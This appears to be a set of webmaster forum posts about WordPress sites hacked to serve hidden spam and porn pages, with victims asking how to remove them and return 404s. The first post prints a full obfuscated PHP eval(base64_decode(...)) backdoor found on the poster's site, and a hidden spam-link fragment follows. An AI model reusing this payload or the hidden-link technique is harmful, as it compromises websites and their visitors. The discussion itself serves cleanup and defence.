[ Malware code redacted ]

Website: https://www.linkedportals.com

Hi All,
I am having an issue with the blog as google webtools is claiming to have found some spam injection in the site.
After going through the blog i have seen

$rzkjfh(strrev(';))"=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"(edoced_46esab(lave'));?>

Is this normal ?

On my 1st blog, the spam URL appears like this:
www.mydomain.info/index.php?category=62&watch=798
all the porn pages are under the ?category=62

On my other site, it appears like this:
www.myotherdomain.info/?category=63&watch=980
Again, there are a bunch of porn related pages under the ?category=63

These URLs have different sex-related titles and they all lead to my homepages. How can I possibly get rid of these URLs and erase them from my site?

Is there a a rewrite or redirect rule that I can put in my htaccess file so that

if (someone requests = https://www.mydomain.com/?category=63&watch=X) then show file not found error ?

Please help. I have to make sure that these URLs will return a 404 error or something like that so I can request Google to remove these from my indexed pages. Thanks

<!– ~ –><u style=”display:none”>bad credit visa card citibank credit card 800 number

There is a huge block of hundreds of these kind of links. From what I’ve read online, everybody says the way to alleviate this problem is to upgrade to the most recent version of WordPress. Coincidentally, I just upgraded to 2.7.1 last week, but I am still having this problem. Any idea on how to resolve it? Thanks.
Ben

Basically someone’s uploaded a LOAD of spammy html pages directly into my WordPress uploads directory. They also took the trouble of creating a sitemap.xml file in there too that listed all these rubbish spam files, and then submitted it to various search engines.

I only even noticed I’d been hacked at all because in my Google Webmaster Tools I saw the “URLs restricted by robots.txt – 246”. I thought this unusually high for my site and upon looking at the list of 246 files saw hundreds of files like “https://www.tmrw.co.uk/demosite/wp-content/uploads/2007/topic-1022.html” indexed – files I’ve never uploaded or personally put on my site. I had a look on my server and there was indeed a whole other website living in my uploads directory.

Thankfully https://www.tmrw.co.uk/demosite/ spider crawling was restricted by my robots.txt file and therefore hasn’t been indexed properly (although google webmaster tools does now tell me the most common words it sees on my site are C*sino, S*x, L*sbian etc – which is a load of rubbish), and I asked my host to immediately delete all these spam files from my server.

So problem solved, spam removed.

Except I’m not sure how it got hacked in the first place. Permissions on https://www.tmrw.co.uk/demosite/wp-content/uploads/ were set so only my server can write to the folder, no ftp access etc, and I’m pretty sure no one manually logged into my demo site and uploaded the 1000’s of files via the wordpress media uploader, so how they got in there I’m non the wiser. All my passwords etc are randomly generated 20 digit strings too, so guessing them seems out of the question?

What’s also confusing is that I thought I was the only one who knew about https://www.tmrw.co.uk/demosite/ at all, I’d not submitted it to any forums etc and my robots.txt was restricting indexing just in case. All I can think is that someone saw what directory’s I was trying to restrict with my robots file and went after one of them.

Anyway, keep an eye out on your uploads directory, protect it the best you can and make sure no one’s making an evil little nest of spam in there.

Rich